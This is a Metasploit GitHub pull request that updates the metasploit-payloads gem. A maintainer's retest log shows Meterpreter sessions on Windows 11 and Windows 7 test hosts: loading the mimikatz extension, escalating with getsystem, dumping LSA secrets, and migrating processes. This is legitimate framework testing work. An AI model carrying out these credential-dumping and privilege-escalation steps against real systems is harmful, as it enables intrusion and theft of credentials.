
Update metasploit-payloads gem to 2.0.165 #18737

Merged
merged 1 commit into from
Jan 25, 2024

Conversation

zeroSteiner
Contributor

@cdelafuente-r7
Contributor

Thanks @zeroSteiner, I did a quick retest to make sure the payloads generated by automation are working as expected.

  • output using an x64 Meterpreter payload against Win11 x64 (loading extension, migrating to an x86 process, etc.)
msf6 payload(cmd/windows/powershell/x64/meterpreter/reverse_tcp) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : DESKTOP-26CQRHP
OS              : Windows 11 (10.0 Build 22000).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > getuid
Server username: DESKTOP-26CQRHP\n00tmeg
meterpreter > load kiwi
Loading extension kiwi...
  .#####.   mimikatz 2.2.0 20191125 (x64/windows)
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'        Vincent LE TOUX            ( vincent.letoux@gmail.com )
  '#####'         > http://pingcastle.com / http://mysmartlogon.com  ***/

Success.
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > lsa_dump_secrets
[+] Running as SYSTEM
[*] Dumping LSA secrets
Domain : DESKTOP-26CQRHP
SysKey : <redacted>

Local name : DESKTOP-26CQRHP ( S-1-5-21-2018954162-2495490444-3936086963 )
Domain name : WORKGROUP

Policy subsystem is : 1.18
...<redacted>...

meterpreter > migrate 3408
[*] Migrating from 2292 to 3408...
[*] Migration completed successfully.
meterpreter > sysinfo
Computer        : DESKTOP-26CQRHP
OS              : Windows 11 (10.0 Build 22000).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter > lsa_dump_secrets
[+] Running as SYSTEM
[*] Dumping LSA secrets
Domain : DESKTOP-26CQRHP
SysKey : <redacted>

Local name : DESKTOP-26CQRHP ( S-1-5-21-2018954162-2495490444-3936086963 )
Domain name : WORKGROUP

Policy subsystem is : 1.18
...<redacted>...

  • output using an x86 Meterpreter payload against Win7 x86 (loading extension, etc.)
msf6 payload(cmd/windows/powershell/meterpreter/reverse_tcp) > sessions -i 3
[*] Starting interaction with 3...

meterpreter > sysinfo
Computer        : WIN7-DEV
OS              : Windows 7 (6.1 Build 7601, Service Pack 1).
Architecture    : x86
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter > getuid
Server username: WIN7-DEV\nutmeg
meterpreter > load kiwi
Loading extension kiwi...
  .#####.   mimikatz 2.2.0 20191125 (x86/windows)
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'        Vincent LE TOUX            ( vincent.letoux@gmail.com )
  '#####'         > http://pingcastle.com / http://mysmartlogon.com  ***/

Success.
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > lsa_dump_secrets
[+] Running as SYSTEM
[*] Dumping LSA secrets
Domain : DESKTOP-26CQRHP
SysKey : <redacted>

Local name : DESKTOP-26CQRHP ( S-1-5-21-2018954162-2495490444-3936086963 )
Domain name : WORKGROUP

Policy subsystem is : 1.18
...<redacted>...

meterpreter > migrate 480
[*] Migrating from 2452 to 480...
[*] Migration completed successfully.
meterpreter > lsa_dump_secrets
[+] Running as SYSTEM
[*] Dumping LSA secrets
Domain : DESKTOP-26CQRHP
SysKey : <redacted>

Local name : DESKTOP-26CQRHP ( S-1-5-21-2018954162-2495490444-3936086963 )
Domain name : WORKGROUP

Policy subsystem is : 1.18
...<redacted>...

@cdelafuente-r7 cdelafuente-r7 added the rn-enhancement release notes enhancement label Jan 25, 2024
@cdelafuente-r7 cdelafuente-r7 merged commit 44bf686 into rapid7:master Jan 25, 2024
58 checks passed
@cdelafuente-r7
Contributor

Release Notes

This updates metasploit-payloads gem to 2.0.165 to pull in changes to support direct syscalls for Meterpreter on Windows. See this PR and this PR for details.
